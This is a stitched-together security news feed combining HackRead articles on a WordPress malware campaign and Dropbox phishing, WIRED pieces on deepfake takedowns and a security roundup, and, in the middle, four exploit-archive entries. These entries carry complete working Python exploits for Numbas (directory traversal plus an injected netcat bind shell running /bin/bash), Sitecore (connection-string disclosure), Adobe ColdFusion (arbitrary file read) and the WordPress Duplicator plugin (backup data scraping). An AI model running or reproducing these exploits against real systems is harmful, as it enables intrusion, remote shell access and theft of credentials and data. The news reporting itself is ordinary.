By Waqas
The February 2024 Global Threat Index report released by Check Point Software Technologies Ltd. exposes the alarming vulnerability of cybersecurity worldwide.
This is a post from HackRead.com Read the original post: FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

WordPress websites are under attack! FakeUpdates malware exploits vulnerabilities and injects malicious code. LockBit3 dominates the world of ransomware. Web server flaws leave organizations exposed. Experts advocate strong security and zero tolerance for cyber threats.

As of March 2024, approximately 835 million websites are utilizing the WordPress Content Management System (CMS). This vast presence makes WordPress an extremely **lucrative target** for cybercriminals.

To highlight the ongoing threats to WordPress, according to the February 2024 Global Threat Index released by Check Point Software Technologies Ltd., this week, researchers have uncovered a fresh wave of cyber threats including malware attacks aimed at WordPress websites.

The campaign, identified as **FakeUpdates or SocGholish**, involved compromising WordPress sites through hacked admin accounts. The malware employed various tactics, including modified versions of legitimate WordPress plugins, to infiltrate websites and deceive users into downloading a Remote Access Trojan.

Despite efforts to combat it, FakeUpdates has persisted since at least 2017, posing a significant threat to website security. Some of the attack’s examples are previously identified incidents targeting products like **Windows** and **Chrome browsers**.

In the attack, the malware primarily targets websites with content management systems, aiming to trick users into downloading malicious software. Associated with the Russian cybercrime group **Evil Corp**, FakeUpdates is believed to generate revenue by selling access to infected systems.

As per the research shared with Hackread.com ahead of publication on Monday, Maya Horowitz, VP of Research at Check Point Software, emphasized the importance of protecting websites from cyber threats.

She highlighted the critical role websites play in modern society and the potential consequences of malware attacks on online presence and reputation. Horowitz stressed the need for proactive measures and a zero-tolerance approach to cybersecurity threats.

****LockBit and Ransomware****

Check Point’s Global Threat Index also **revealed** insights into ransomware activities, including data from approximately 200 ransomware “shame sites” operated by double-extortion ransomware groups.

Lockbit3, **despite its shutdown**, not only **returned** also but remained the most prevalent ransomware group in February, responsible for 20% of reported incidents. Play and 8base followed closely, with 8% and 7% of incidents, respectively. Play, which entered the top three for the first time, was responsible for a **recent cyberattack** on the city of Oakland.

Additionally, the report highlighted the most exploited vulnerabilities globally in February. The “Web Servers Malicious URL Directory Traversal” vulnerability affected 51% of organizations, followed by “Command Injection Over HTTP” and “Zyxel ZyWALL Command Injection,” each impacting 50% of organizations.

****Protect Your WordPress Website****

Here are 6 important tips to protect your WordPress website:

****Strong Login Credentials:****

*   Always use a strong and unique password for your WordPress admin account. Avoid using easily guessable information like your name, birthday, or pet’s name.
*   Consider using a password manager to generate and store strong passwords for all your online accounts.
*   Enable two-factor authentication (2FA) for an extra layer of security. This requires a second verification code, typically sent to your phone, in addition to your password when logging in.

**Regular Updates:**

*   Regularly update your WordPress core, themes, and plugins. Updates often contain security patches that address newly discovered vulnerabilities.
*   You can enable automatic updates in the WordPress dashboard to ensure your website stays up-to-date.

**Security Plugins:**

*   Consider installing a security plugin to add additional layers of protection to your website. These plugins can help monitor your website for malware, block suspicious activity, and protect against brute-force login attempts.

**Backups:**

*   Regularly back up your website files and database. This will allow you to restore your website to its previous state if it is compromised by a cyberattack.
*   There are several plugins available that can automate the backup process.

****Limit User Access:****

*   Only grant users the minimum level of access they need to perform their tasks. For example, if a user only needs to edit blog posts, there is no need to give them administrator privileges.

****Secure Hosting Provider**:**

Choose a reputable web hosting provider that prioritizes security measures. While choosing a hosting service, always look for features like the following:

*   Regular security audits and vulnerability assessments.
*   Automatic malware scanning and removal.
*   Firewalls and intrusion detection systems.
*   Secure data centres with physical and digital access control.

1.  Fake Lockdown Mode Exposes iOS Users to Malware Attacks
2.  Fake Skype, Zoom, Google Meet Sites Infect Devices with RATs
3.  The Fake Fix: New Chae$ 4.1 Malware Hides in Driver Downloads
4.  Hackers on WordPress Websites Hacking Spree with Balada Malware
5.  Fake Resumes, Real Malware: TA4557 Exploits Recruiters for Backdoor

FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

    # Exploit Title: Numbas < v7.3 - Remote Code Execution# Google Dork: N/A# Date: March 7th, 2024# Exploit Author: Matheus Boschetti# Vendor Homepage: https://www.numbas.org.uk/# Software Link: https://github.com/numbas/Numbas# Version: 7.2 and below# Tested on: Linux# CVE: CVE-2024-27612import sys, requests, re, argparse, subprocess, timefrom bs4 import BeautifulSoups = requests.session()def getCSRF(target):    url = f"http://{target}/"    req = s.get(url)    soup = BeautifulSoup(req.text, 'html.parser')    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']    return csrfmiddlewaretokendef createTheme(target):    # Format request    csrfmiddlewaretoken = getCSRF(target)    theme = 'ExampleTheme'    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'    data = (        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'        '\r\n'        f'{csrfmiddlewaretoken}\r\n'        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="name"\r\n'        '\r\n'        f'{theme}\r\n'        f'--{boundary}--\r\n'    )    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',               'User-Agent': 'Mozilla/5.0',               'Accept': '*/*',               'Connection': 'close'}    # Create theme and return its ID    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)    redir = req.url    split = redir.split('/')    id = split[4]    print(f"\t[i] Theme created with ID {id}")    return iddef login(target, user, passwd):    print("\n[i] Attempting to login...")    csrfmiddlewaretoken = getCSRF(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'username': user,            'password': passwd,            'next': '/'}        # Login    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)    res = login.text    if("Logged in as" not in res):        print("\n\n[!] Login failed!")        sys.exit(-1)    # Check if logged and fetch ID    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)    if usermatch:        user = usermatch.group(1)        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)        if idmatch:            id = idmatch.group(1)            print(f"\t[+] Logged in as \"{user}\" with ID {id}")def checkVuln(url):    print("[i] Checking if target is vulnerable...")    # Attempt to read files    themeID = createTheme(url)    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."    hname = s.get(f"{target}/etc/hostname")    ver = s.get(f"{target}/etc/issue")    hnamesoup = BeautifulSoup(hname.text, 'html.parser')    versoup = BeautifulSoup(ver.text, 'html.parser')    hostname = hnamesoup.find('textarea').get_text().strip()    version = versoup.find('textarea').get_text().strip()    if len(hostname) < 1:        print("\n\n[!] Something went wrong - target might not be vulnerable.")        sys.exit(-1)    print(f"\n[+] Target \"{hostname}\" is vulnerable!")    print(f"\t[i] Running: \"{version}\"")    # Cleanup - delete theme    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")    target = f"http://{url}/themes/{themeID}/delete"    csrfmiddlewaretoken = getCSRF(url)    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}    s.post(target, data=data)def replaceInit(target):    # Overwrite __init__.py with arbitrary code    rport = '8443'    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"    csrfmiddlewaretoken = getCSRF(target)    filename = '../../../../numbas_editor/numbas/__init__.py'    themeID = createTheme(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'source': payload,            'filename': filename}    print("[i] Delivering payload...")    # Retry 5 times in case something goes wrong...    for attempt in range(5):        try:            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)        except Exception as e:            pass        # Establish connection to bind shell    time.sleep(2)    print(f"\t[+] Payload delivered, establishing connection...\n")    if ":" in target:        split = target.split(":")        ip = split[0]    else:        ip = str(target)    subprocess.Popen(["nc", "-n", ip, rport])    while True:        passdef main():    parser = argparse.ArgumentParser()    if len(sys.argv) <= 1:        print("\n[!] No option provided!")        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")        sys.exit(-1)    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')    parser.add_argument('--target', help='Target IP:PORT')    parser.add_argument('--user', help='Username to authenticate')    parser.add_argument('--passwd', help='Password to authenticate')    args = parser.parse_args()    action = args.action    target = args.target    user = args.user    passwd = args.passwd    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")        if action == 'check':        login(target, user, passwd)        checkVuln(target)    elif action == 'exploit':        login(target, user, passwd)        replaceInit(target)    else:        sys.exit(-1)if __name__ == "__main__":    main()

Numbas Remote Code Execution

Sitecore version 8.2 suffers from a remote code execution vulnerability.

    #!/usr/bin/env python3## Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla# Google Dork: N/A# Date: 2024-01-08# Vendor Homepage: https://www.sitecore.com/# Software Link: https://dev.sitecore.net/# Version: 10.3# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09# Video POC : https://youtu.be/vWKl9wgdTB0import argparseimport requestsfrom urllib.parse import quotefrom rich.console import Consoleconsole = Console()def initial_test(hostname):    # Initial payload to test vulnerability    test_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='TestVulnerability'    />    '''    encoded_payload = quote(test_payload)    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"    headers = {"Content-Type": "application/x-www-form-urlencoded"}    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)    response = requests.post(url, headers=headers, data=data, verify=False)    # Check for the test string in the Content-Type of the response    return 'TestVulnerability' in response.headers.get('Content-Type', '')def get_payload(choice):    # Payload templates for different options    payloads = {        '1': "<%$ ConnectionStrings:core %>",        '2': "<%$ ConnectionStrings:master %>",        '3': "<%$ ConnectionStrings:web %>"    }    base_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='{}'    />    '''    return base_payload.format(payloads.get(choice, "Invalid"))def main(hostname):    if initial_test(hostname):        print("Exploiting, Please wait...")        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")        print("Select the payload to use:")        print("1: Core connection strings")        print("2: Master connection strings")        print("3: Web connection strings")        payload_choice = input("Enter your choice (1, 2, or 3): ")        payload = get_payload(payload_choice)        encoded_payload = quote(payload)        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"        headers = {"Content-Type": "application/x-www-form-urlencoded"}        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)        response = requests.post(url, headers=headers, data=data)        if 'Content-Type' in response.headers:            print("Content-Type from the response header:")            print("\n")            print(response.headers['Content-Type'])        else:            print("No Content-Type in the response header. Status Code:", response.status_code)    else:        print("The target does not appear to be vulnerable to CVE-2023-35813.")if __name__ == "__main__":    console.print("[bold green]Author: Abhishek Morla[/bold green]")    console.print("[bold red]CVE-2023-35813[/bold red]")    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')    args = parser.parse_args()    main(args.hostname)

Sitecore 8.2 Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

WordPress Duplicator plugin versions prior to 1.5.7.1 suffer from an unauthenticated sensitive data exposure vulnerability that can lead to account takeover.

    # Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 -Unauthenticated Sensitive Data Exposure to Account Takeover# Google Dork: inurl:("plugins/duplicator/")# Date: 2023-12-04# Exploit Author: Dmitrii Ignatyev# Vendor Homepage:https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free# Software Link: https://wordpress.org/plugins/duplicator/# Version: 1.5.7.1# Tested on: Wordpress 6.4# CVE : CVE-2023-6114# CVE-Link :https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/Asevere vulnerability has been discovered in the directory*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not onlyexposes extensive information about the site, including itsconfiguration, directories, and files, but more critically, itprovides unauthorized access to sensitive data within the database andall data inside. Exploiting this vulnerability poses an imminentthreat, leading to potential *brute force attacks on password hashesand, subsequently, the compromise of the entire system*.*POC*:1) It is necessary that either the administrator or auto-backup worksautomatically at the scheduled time2) Exploit will send file search requests every 5 seconds3) I attack the site with this vulnerability using an exploitExploit sends a request to the server every 5 seconds along the path“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/<http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and ifit finds something in the index of, it instantly parses all the dataand displays it on the screenExploit (python3):import requestsfrom bs4 import BeautifulSoupimport reimport timeurl = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"processed_files = set()def get_file_names(url):    response = requests.get(url)    if response.status_code == 200 and len(response.text) > 0:        soup = BeautifulSoup(response.text, 'html.parser')        links = soup.find_all('a')        file_names = []        for link in links:            file_name = link.get('href')            if file_name != "../" and not file_name.startswith("?"):                file_names.append(file_name)        return file_names    return []def get_file_content(url, file_name):    file_url = url + file_name    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):        print(f"Ignoring file: {file_name}")        return None    file_response = requests.get(file_url)    if file_response.status_code == 200:        return file_response.text    return Nonewhile True:    file_names = get_file_names(url)    if file_names:        print("File names on the page:")        for file_name in file_names:            if file_name not in processed_files:                print(file_name)                file_content = get_file_content(url, file_name)                if file_content is not None:                    print("File content:")                    print(file_content)                    processed_files.add(file_name)    time.sleep(5)-- With best regards,Dmitrii Ignatyev, Penetration Tester

WordPress Duplicator Data Exposure / Account Takeover

By Waqas
That new Dropbox email landing in your inbox might be part of a phishing or malspam attack!
This is a post from HackRead.com Read the original post: Dropbox Abused in New Phishing, Malspam Scam to Steal SaaS Logins

Beware of phishing and malspam scams targeting your Software-as-a-Service (SaaS) logins! Cybercriminals are using fake Dropbox emails to steal login credentials. Learn how to protect yourself from this new attack and keep your data safe.

Cybersecurity firm Darktrace is warning users about a notorious new phishing and Malspam campaign targeting customers of popular Software-as-a-Service (**SaaS**) platforms by exploiting Dropbox emails.

Cambridge, UK-based cybersecurity firm Darktrace’s latest research reveals a new Dropbox phishing attack successfully **bypassing MFA** (multi-factor authentication) protocols. This exploit aims to trick users into downloading malware and exposing their login credentials.

It’s been observed that attackers send seemingly harmless emails originating from a legitimate **Dropbox** address, containing a malicious link. On January 25, 2024, researchers detected a suspicious email sent to 16 internal users of the Darktrace SaaS environment, originating from a legitimate email address- ‘no-reply@dropboxcom’. 

Screenshot credit: Darktrace

The email contained a link to a PDF file hosted on Dropbox, possibly named after a Dropbox partner organization. The PDF file contained a suspicious link to a domain named ‘mmv-securitytop.’ Darktace’s email security tool detected and held the email, but a user received another email from a legitimate no-reply@dropboxcom on January 29, requesting to open the previously shared PDF file.

“Darktrace/Email moved the email to the user’s junk file and applied a lock link action to prevent the user from directly following a potentially malicious link,” but couldn’t prevent the damage because an employee clicked on the link.

Next, the user’s device got connected to a malicious endpoint, ‘mmv-securitytop’, leading to a **fake Microsoft 365 login page**. These credential harvesters, disguised as trusted organizations like Microsoft, increase the likelihood of stealing privileged SaaS account credentials. 

The fake Microsoft login page – Screenshot credit: Darktrace

Since January 31, Darktrace observed suspicious SaaS activity, including logins from unusual locations and endpoints associated with **ExpressVPN**, suggesting threat actors are using a VPN to mask their true location.

An interesting finding was that threat actors bypassed a customer’s MFA policy using valid tokens and meeting authentication requirements. An additional login was observed from 87.117.225155, using the **HideMyAss VPN** service.

According to Darktrace’s **blog post**, the actor created a new email rule, ‘….’, to move emails to the ‘Conversation History’ mailbox folder, a tactic used by threat actors during phishing campaigns. This generic name helps maintain undetected activity on target networks.

Dropbox exploitation is gaining popularity among threat actors, as it is difficult to detect foul play because emails are sent from legitimate addresses. In September 2023, Hackread.com **reported** a BEC 3.0 attack campaign leveraging Dropbox to send emails redirecting users to credential-harvesting pages.

Clicking on malicious links in phishing emails can lead to malware infections, stealing of sensitive data, and compromising login credentials. In business settings, **a single employee’s account** can allow attackers to access the entire SaaS environment, thereby disrupting operations.

****Protection Against Phishing Attacks****

While relying on common sense is typically the best defence against such attacks, scammers’ increasing sophistication can sometimes override our natural caution. Therefore, it’s crucial to proactively protect yourself. Here are 5 key points to help you recognize and safeguard against email phishing:

**Suspicious Sender Addresses and Email Content:**

*   Check sender email addresses carefully for typos or misspellings of legitimate companies.
*   Be wary of generic greetings or an impersonal tone.
*   Look for grammatical errors or unusual phrasing in the email body.
*   Watch out for emails with a strong sense of urgency or pressure to act quickly.

**Malicious Links and Attachments:**

*   Never click on links or open attachments in emails from unknown senders.
*   Hover over a link to see the actual destination URL before clicking. It might not match the displayed text.
*   Don’t download attachments you weren’t expecting, even from seemingly familiar senders.

**Phishing for Information:**

*   Phishing emails often try to trick you into revealing personal information like passwords or credit card details.
*   Legitimate companies will never ask for such information via email.

**Multi-Factor Authentication (MFA) and Strong Passwords:**

*   Although, in this case, scammers bypass MFA, it is still the most preferred way to protect suspicious logins.
*   Enable MFA on all your online accounts whenever possible. This adds an extra layer of security beyond just your password.
*   Use strong, unique passwords for all your online accounts and avoid using the same password for multiple accounts.

**Staying Informed and Reporting Phishing Attempts:**

*   Keep yourself updated on the latest phishing tactics by reading security blogs or news articles.
*   Report suspicious emails to your email provider or the platform it impersonates. This helps them track and block future phishing attempts.

1.  How Human Elements Impact Email Security
2.  Microsoft Teams Flaw Sends Malware to Employees’ Inboxes
3.  Employee Duped by AI-Generated CFO in $25.6M Deepfake Scam
4.  ALPHV Ransomware Used Vishing to Scam MGM Resorts Employee
5.  MoleRats using Facebook, Dropbox, Google Docs to spread malware
6.  A Tricky PayPal Phishing Scam That Comes From Official PayPal Email

Dropbox Abused in New Phishing, Malspam Scam to Steal SaaS Logins

Content creators are using copyright laws to get nonconsensual deepfakes removed from the web. With the complaints covering nearly 30,000 URLs, experts say Google should do more to help.

The number of nonconsensual deepfake porn videos online has exploded since 2017. As the harmful videos have spread, thousands of women—including Twitch streamers, gamers, and other content creators—have complained to Google about websites hosting the videos and tried to get the tech giant to remove them from its search results.

A WIRED analysis of copyright claims regarding websites that host deepfake porn videos reveals that thousands of takedown requests have been made, with the frequency of complaints increasing. More than 13,000 copyright complaints—encompassing almost 30,000 URLs—have been made to Google concerning content on a dozen of the most popular deepfake websites.

The complaints, which have been made under the Digital Media Copyright Act (DMCA), have resulted in thousands of nonconsensual videos being removed from the web. Two of the most prominent deepfake video websites have been the subject of more than 6,000 and 4,000 complaints each, data published by Google and Harvard University’s Lumen database shows. Across all the deepfake platforms analyzed, around 82 percent of complaints resulted in URLs being removed from Google, the company’s copyright transparency data shows.

Millions of people find and access deepfake video websites by searching for deepfakes, often alongside the names of celebrities or content creators. WIRED is not naming the specific websites to limit the exposure they receive. However, lawyers and companies combating deepfakes online, including by systematically making DMCA complaints, say the number of copyright complaints and high percentage of removals are a sign that Google should take more action against the specific websites. This should include removing them from search results entirely, they say.

“If the sole purpose of these websites is to abuse and manipulate a person’s personal brand, or take their autonomy away from them, or host simple revenge porn, they shouldn’t be there,” says Dan Purcell, the founder and CEO of Ceartas, a firm that helps creators remove their content when it is being used without permission.

For the biggest deepfake video website alone, Google has received takedown requests for 12,600 URLs, 88 percent of which have been taken offline. Purcell says that given the large volume of offending content, the tech company should be examining why the site is still in search results. “If you remove 12,000 links for infringement, why are they not just completely removed?” He adds: “They should not be crawled. They’re of no public interest.”

In the five years since nonconsensual deepfake porn videos first emerged, tech companies and lawmakers have been slow to act. At the same time, machine learning improvements have made it easier to create deepfakes. Today, there are a few kinds of explicit deepfake content: videos where a person’s face is put onto existing consensual pornography, apps that can “undress” a person or swap their face onto a nude image, and some generative AI that allows entirely new deepfake images to be created, such as the images of Taylor Swift which spread online in January.

Each method is weaponized—almost always against women—to degrade, harass, or cause shame, among other harms. Julie Inman Grant, Australia’s e-safety commissioner, says her office is starting to see more deepfakes reported to its image-based abuse complaints scheme, alongside other AI-generated content, such as “synthetic” child sexual abuse and children using apps to create sexualized videos of their classmates. “We know it’s a really underreported form of abuse,” Grant says.

As the number of videos on deepfake websites has grown, content creators—such as streamers and adult models—have used DMCA requests. The DMCA allows people who own the intellectual property of certain content to request it be removed from the websites directly or from search results. More than 8 billion takedown requests, covering everything from gaming to music, have been made to Google.

“The DMCA historically has been an important way for victims of image-based sexual abuse to get their content removed from the internet,” says Carrie Goldberg, a victims’ rights attorney. Goldberg says newer criminal laws and civil law procedures make it easier to get some image-based sexual abuse removed, but deepfakes complicate the situation. “While platforms tend to have no empathy for victims of privacy violations, they do respect copyright laws,” Goldberg says.

WIRED’s analysis of deepfake websites, which covered 14 sites, shows that Google has received DMCA takedown requests about all of them in the past few years. Many of the websites host only deepfake content and often focus on celebrities. The websites themselves include DMCA contact forms where people can directly request to have content removed, although they do not publish any statistics, and it is unclear how effective they are at responding to complaints. One website says it contains videos of “actresses, YouTubers, streamers, TV personas, and other types of public figures and celebrities.” It hosts hundreds of videos with “Taylor Swift” in the video title.

The vast majority of DMCA takedown requests linked to deepfake websites listed in Google’s data relate to two of the biggest sites. Neither responded to written questions sent by WIRED. The majority of the 14 websites had over 80 percent of the complaints leading to content being removed by Google. Some copyright takedown requests sent by individuals indicate the distress the videos can have. “It is done to demean and bully me,” one request says. “I take this very seriously and I will do anything and everything to get it taken down,” another says.

“It has such a huge impact on someone’s life,” says Yvette van Bekkum, the CEO of Orange Warriors, a firm that helps people remove leaked, stolen, or nonconsensually shared images online, including through DMCA requests. Van Bekkum says the organization is seeing an increase in deepfake content online, and victims face hurdles to come forward and ask that their content is removed. “Imagine going through a hiring process and people Google your name, and they find that kind of explicit content,” van Bekkum says.

Google spokesperson Ned Adriance says its DMCA process allows “rights holders” to protect their work online and the company has separate tools for dealing with deepfakes—including a separate form and removal process. “We have policies for nonconsensual deepfake pornography, so people can have this type of content that includes their likeness removed from search results,” Adriance says. “And we’re actively developing additional safeguards to help people who are affected.” Google says when it receives a high volume of valid copyright removals about a website, it uses those as a signal the site may not be providing high-quality content. The company also says it has created a system to remove duplicates of nonconsensual deepfake porn once it has removed one copy of it, and that it has recently updated its search results to limit the visibility for deepfakes when people aren't searching for them.

The DMCA is an imperfect tool, particularly when it comes to deepfakes. Goldberg says it needs someone to “affirm under penalty of perjury” that they’re the copyright holder of the video or images. “But the process of creating a deepfake can transform the image so much that the resulting image is not the same intellectual property as the images it was sourced from,” Goldberg says. Ultimately, this could mean the person creating the deepfake video may be the copyright holder of the abusive content. “Our firm has long advocated that the copyrighting of illegal works should revert to the victims so they can exercise control over them,” Goldberg says. “But the law has not yet caught up.”

Purcell, from Ceartas, says that the law is “not fit for purpose” and can be very “easily weaponized” by deepfake websites filing counternotices against DMCA requests. “At that point, the only option is to sue them,” Purcell says, which raises its own problems. The websites often don’t include contact details or information about who created them, and they can be based in countries with difficult legal regimes. “They will do anything to stay anonymous. They will hide themselves,” van Bekkum says. “They are using, on purpose, hosting companies offshore.”

Grant, the Australian regulator, says her office works with technology platforms and can also issue orders for content to be removed. The office has also targeted individuals who upload videos to deepfake websites. Last year, Grant’s office pursued a man who uploaded images of Australian public figures to one of the largest deepfake websites. He was ordered to remove the material and delete it from his devices.

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right,” he emailed back after receiving the legal order, according to court documents. Months later, border officials told Grant that the man had entered Australia, and he was ultimately charged with contempt of court.

The incident was a rare example of a regulator or law enforcement body taking successful action against someone creating deepfakes. Adam Dodge, a lawyer and founder of Endtab (Ending Technology-Enabled Abuse), says technology companies should be funding greater education efforts in schools and communities about the harms of creating and sharing deepfakes, while legislators should put in place laws that don’t push the burden of getting content removed on the victims. “It needs to be considered as harmful, as devastating, and as important to internet safety as other forms of banned or criminal or regulated material that people find to be abhorrent and unacceptable,” Dodge says.

Google Is Getting Thousands of Deepfake Porn Complaints

Plus: An ex-Google engineer gets arrested for allegedly stealing trade secrets, hackers breach the top US cybersecurity agency, and X’s new feature exposes sensitive user data.

For years, Registered Agents Inc.—a secretive company whose business is setting up other businesses—has registered thousands of companies to people who appear to not exist. Multiple former employees tell WIRED that the company routinely incorporates businesses on behalf of its customers using what they claim are fake personas. An investigation found that incorporation paperwork for thousands of companies that listed these allegedly fake personas had links to Registered Agents.

State attorneys general from around the US sent a letter to Meta on Wednesday demanding the company take “immediate action” amid a record-breaking spike in complaints over hacked Facebook and Instagram accounts. Figures provided by the office of New York attorney general Letitia James, who spearheaded the effort, show that in 2023 her office received more than 780 complaints—10 times as many as in 2019. Many complaints cited in the letter say Meta did nothing to help them recover their stolen accounts. “We refuse to operate as the customer service representatives of your company,” the officials wrote in the letter. “Proper investment in response and mitigation is mandatory.”

Meanwhile, Meta suffered a major outage this week that took most of its platforms offline. When it came back, users were often forced to log back in to their accounts. Last year, however, the company changed how two-factor authentication works for Facebook and Instagram. Now, any devices you’ve frequently used with Meta services in recent years will be trusted by default. The move has made experts uneasy; this means that your devices may not need a two-factor authentication code to log in anymore. We updated our guide for how to turn off this setting.

A ransomware attack targeting medical firm Change Healthcare has caused chaos at pharmacies around the US, delaying delivery of prescription drugs nationwide. Last week, a Bitcoin address connected to AlphV, the group behind the attack, received $22 million in cryptocurrency—suggesting Change Healthcare has likely paid the ransom. A spokesperson for the firm declined to answer whether it was behind the payment.

And there’s more. Each week, we highlight the news we didn’t cover in depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

In January, Microsoft revealed that a notorious group of Russian state-sponsored hackers known as Nobelium infiltrated the email accounts of the company's senior leadership team. Today, the company revealed that the attack is ongoing. In a blog post, the company explains that in recent weeks, it has seen evidence that hackers are leveraging information exfiltrated from its email systems to gain access to source code and other “internal systems.”

It is unclear exactly what internal systems were accessed by Nobelium, which Microsoft calls Midnight Blizzard, but according to the company, it is not over. The blog post states that the hackers are now using “secrets of different types” to breach further into its systems. “Some of these secrets were shared between customers and Microsoft in email, and as we discover them in our exfiltrated email, we have been and are reaching out to these customers to assist them in taking mitigating measures.”

